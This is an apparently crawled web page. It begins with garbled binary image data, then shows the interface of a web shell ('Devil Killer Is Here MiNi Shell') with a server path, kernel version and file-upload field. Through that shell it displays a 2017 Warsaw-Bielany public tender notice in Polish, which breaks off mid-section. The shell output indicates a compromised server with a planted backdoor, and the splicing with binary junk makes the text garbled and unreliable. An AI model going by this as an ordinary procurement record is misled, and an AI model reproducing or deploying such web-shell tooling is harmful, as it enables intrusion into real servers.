JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170519/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170519/511053-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 511053-N-2017 z dnia 2017-05-19 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Miasto Stołeczne Warszawa - Dzielnica Bielany</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">OPRACOWANIE PROGRAMU FUNKCJONALNO-UŻYTKOWEGO Z WYLICZENIEM PLANOWANYCH KOSZTÓW ROBÓT BUDOWLANYCH I PRAC PROJEKTOWYCH, W RAMACH ZADANIA INWESTYCYJNEGO PN. "BUDOWA NOWEGO BUDYNKU PRZEDSZKOLA NR 327 UL.CONRADA 10A"</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia">0%</span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Miasto Stołeczne Warszawa - Dzielnica Bielany</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">1525966300043</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Żeromskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">29</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">01-882 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Warszawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">022 37 33 333</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">bielany.zamowienia@um.warszawa.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">022 37 33 382</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.bielany.waw.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://www.bielany.waw.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Składanie wniosków o dopuszczenie do udziału w licytacji elektronicznej odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z 23 listopada 2012 r. - Prawo pocztowe (Dz.U. z 2012 r. poz. 1529 oraz z 2015 r. poz.1830) posłańca lub osobiście (wniosek musi być złożony w formie pisemnej)</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">ul.S.Żeromskiego 29 (pokój nr 385), 01-882 Warszawa</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">OPRACOWANIE PROGRAMU FUNKCJONALNO-UŻYTKOWEGO Z WYLICZENIEM PLANOWANYCH KOSZTÓW ROBÓT BUDOWLANYCH I PRAC PROJEKTOWYCH, W RAMACH ZADANIA INWESTYCYJNEGO PN. "BUDOWA NOWEGO BUDYNKU PRZEDSZKOLA NR 327 UL.CONRADA 10A"</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">UD-III-WZP.271.27.2017.EKR</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest opracowanie Programu Funkcjonalno-Użytkowego zwyliczeniem planowanych kosztów realizacji budowy nowego budynku Przedszkola nr 327 ul.Conrada10a. 1.Szczegółowy zakres przedmiotu zamówienia opisuje wzór umowy zamieszczony w sekcji IV -pkt 4) Ogłoszenia (stanowiący równocześnie załącznik nr 1 do Ogłoszenia). 2.Zawartość programufunkcjonalno-użytkowego ma być w pełni zgodna z Rozporządzeniem Ministra Infrastruktury z dnia 2września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U.z 2013 r. poz. 1129 z późn. zm.), a planowane koszty w pełni zgodne z Rozporządzeniem MinistraInfrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysuinwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robótbudowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. z 2004 poz. 1389). 3.Terminrealizacji przedmiotowego zamówienia: od dnia podpisania umowy do dnia 15 lipca 2017 r. 4.Napodstawie art.29 ust.3a ustawy Prawo zamówień publicznych, Zamawiający nie wymaga w okresieprowadzenia usług skierowania przez Wykonawcę lub Podwykonawcę zatrudnionych na podstawieumowy o pracę, pracowników do wykonywania czynności w zakresie realizacji zamówienia.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">71320000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">0,00</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2017-07-15 00:00:00</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Zasady przygotowania wniosku o dopuszczenie do udziału w licytacjielektronicznej: 1) Treść wniosku o dopuszczenie do udziału w licytacji elektronicznej wraz zpozostałymi załącznikami, można pobrać ze strony internetowej Zamawiającego:http://www.bielany.waw.pl - odpowiednio w formacie pdf/word. 2) Wykonawca może złożyć tylkojeden wniosek. Złożenie większej liczby wniosków spowoduje odrzucenie wszystkich złożonych wniosków złożonych przez danego Wykonawcę. 3) Wniosek oraz wszelkie wymagane dokumentymuszą spełniać następujące wymogi: a) musi zostać sporządzony w języku polskim, z zachowaniemformy pisemnej na maszynie do pisania, komputerze, ręcznie długopisem czytelnym pismem, b)wniosek i wszystkie załączone dokumenty sporządzone przez Wykonawcę muszą być podpisane; zapodpisanie uznaje się własnoręczny podpis z pieczątką imienną lub czytelnie imię i nazwisko osoby/óbupoważnionej/ych do reprezentowania, zgodnie z formą reprezentacji Wykonawcy, określoną wdokumencie rejestrowym lub innym dokumencie, właściwym dla formy organizacyjnej. 3) Wprzypadku, gdy Wykonawcę reprezentuje pełnomocnik, do wniosku musi być dołączonepełnomocnictwo (oryginał lub poświadczona notarialnie kopia) określające jego zakres i podpisaneprzez osoby uprawnione do reprezentacji Wykonawcy. 4) Dokumenty należy złożyć w formie oryginałulub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (osobę upoważnioną doreprezentacji Wykonawcy zgodnie z aktualnym dokumentem rejestrowym firmy lub zgodnie zpełnomocnictwem) z wyłączeniem dokumentów, których forma została odmiennie określona wogłoszeniu. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz wprzypadku innego podmiotu, na którego zdolnościach lub sytuacji Wykonawca polega na zasadachokreślonych w art.22a ust.1 ustawy, poświadczenia za zgodność z oryginałem dokonują odpowiednioWykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podmiot, na któregozdolnościach lub sytuacji polega Wykonawca, w zakresie dokumentów, które każdego z nich dotyczą. 5) Osobą stwierdzającą zgodność kopii dokumentu zoryginałem musi być osoba/y upoważniona/e do reprezentowania Wykonawcy zgodnie z aktualnymdokumentem rejestrowym firmy lub zgodnie z pełnomocnictwem. 6) Poprawki lub zmiany (równieżprzy użycia korektora) powinny być parafowane przez osobę/y podpisującą/e wniosek. 7) Dokumentysporządzone w języku obcym, muszą być składane wraz z ich tłumaczeniem na język polski,poświadczonym przez Wykonawcę. 8) Wniosek wraz z załącznikami należy złożyć w zamkniętejkopercie opatrzonej co najmniej nazwą przedmiotu zamówienia. 9) Postępowanie o udzieleniezamówienia publicznego prowadzone jest w trybie licytacji elektronicznej na podstawie przepisówustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2015 r., poz. 2164 ze zm.),zwanej w ogłoszeniu ustawą. 10) Nr sprawy UD-III-WZP.271.27.2017.EKR - Wykonawcy winni wewszystkich kontaktach z Zamawiającym, powoływać się na wskazany nr sprawy. 11) Osoba dokontaktu: w zakresie przedmiotu zamówienia - Andrzej Zalewski z Wydziału Infrastruktury, wzakresie formalno-prawnym - Eliza Krych-Palusińska z Wydziału Zamówień Publicznych.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określa niniejszego warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określa niniejszego warunku.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Za spełniający warunek udziału w postępowaniu Zamawiający uznaWykonawców, którzy wykażą, że w okresie ostatnich 3 lat przed upływem terminu składaniawniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jestkrótszy - w tym okresie, wykonali (zakończyli) usługę polegającą min. na: opracowaniu programufunkcjonalno-użytkowego na wzniesienie budynku/budynków o konstrukcji żelbetowej, za kwotębrutto minimum 20 000,00 zł brutto. Ocena spełniania warunku udziału w postępowaniu dokonanazostanie w systemie ,,1" lub ,,0", zgodnie z formułą ,,spełnia-nie spełnia" w oparciu o informacjezawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu, o którym mowa w sekcjiIII - pkt 3) Ogłoszenia.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB 